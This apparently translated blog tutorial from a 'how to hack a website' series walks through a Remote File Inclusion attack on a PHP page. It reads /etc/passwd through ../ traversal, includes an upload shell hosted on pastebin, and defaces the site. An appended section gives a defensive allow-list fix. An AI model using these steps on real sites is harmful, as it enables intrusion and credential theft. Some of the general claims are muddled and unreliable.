- Tram Ho
Most people have seen a website that was hacked and had its interface changed to "Anonymous", "hacked by abc…" and so on. So how can hackers do that?
So far, there are 3 popular ways:
- Remote File Include (RFI)
- SQL injection
- Cross-site Scripting
What all 3 have in common is file upload, that is, getting malicious files onto the server, whether PHP, HTML, JS, …. We start with the first way: Remote File Include (RFI).
The File Inclusion vulnerability allows hackers to gain unauthorized access to sensitive files on the web server or to execute malicious files through the "include" function. It occurs because inadequate input checking makes it possible for hackers to insert malicious data.
Theory alone is quite vague; the details are shown in this video.
For example, we have this site
The explanation is as follows: the PHP page reads the file named in the page variable, here photos.php. If this input is not properly filtered, a hacker can take advantage of the vulnerability to read more sensitive files, such as the password file.
Here we try passing a Google URL:
abc. com/index.php?page=http:// google.com
Tada, the Google search page is displayed.
So index.php does not filter its input. Can we read the password file? Initially I tried etc/passwd.
The result did not show anything. Continue with the path technique of going up a directory using ../
Still nothing visible, so continue up the path.
Finally, the whole passwd file was revealed after 2 attempts.
It does not stop here. If you can read any file, why not try reading a file whose purpose is to upload files to the server? Prepare 1 file, uploadShell.php. Copy the code into pastebin in order to get a link. After a while, we have 1 link with PHP code to upload files, and the result is as follows:
abc. com/index.php?page=https:// pastebin. com/xyz
Now it is just a matter of uploading a file; which file depends only on the purpose of the hacker. In the video I want to overwrite the file dispo_call.php, so I created a PHP file with exactly the same name whose source code is a web page announcing that this site has been hacked. Finally it succeeds, and the challenge is complete.
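The fix for the flaw exploited above, as an added example that is not part of the original post: it assumes index.php passes the page parameter straight to include (the post's own source is not shown) and replaces that with an allow-list. The pages/ directory and the home entry are hypothetical; only photos.php comes from the post.

```php
<?php
declare(strict_types=1);

// Vulnerable pattern assumed from the walkthrough (the post's source is not shown):
//     include $_GET['page'];   // accepts ../ paths and, with allow_url_include=On, URLs

// Hypothetical layout: includable pages live in ./pages next to index.php.
const PAGES_DIR = __DIR__ . '/pages';

// Allow-list: request value => file on disk. Only photos.php appears in the post.
const ALLOWED_PAGES = [
    'home'       => 'home.php',      // hypothetical
    'photos.php' => 'photos.php',
];

/** Return the absolute path to include, or null if the request is not allowed. */
function resolve_page($requested): ?string
{
    // ?page[]=x arrives as an array; anything that is not a string is rejected.
    if (!is_string($requested) || !array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }
    // The path is built from the allow-list value, never from user input.
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . ALLOWED_PAGES[$requested]);
    if ($base === false || $path === false) {
        return null; // directory or file missing
    }
    // Defence in depth: a symlink inside pages/ must not lead outside it.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$target = resolve_page($_GET['page'] ?? 'home');
if ($target === null) {
    http_response_code(404);
    exit('Page not found');
}
include $target;
```

With this in place a URL, etc/passwd, or any ../ path in page gets a 404 because none of them is a key in the allow-list. Keeping allow_url_include set to Off in php.ini (its default) also blocks the URL variant in any include that was missed.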
That is my demonstration for this how-to-hack-a-website series. If you like articles like this, then look forward to episode 2 of this series.
Source : Techtalk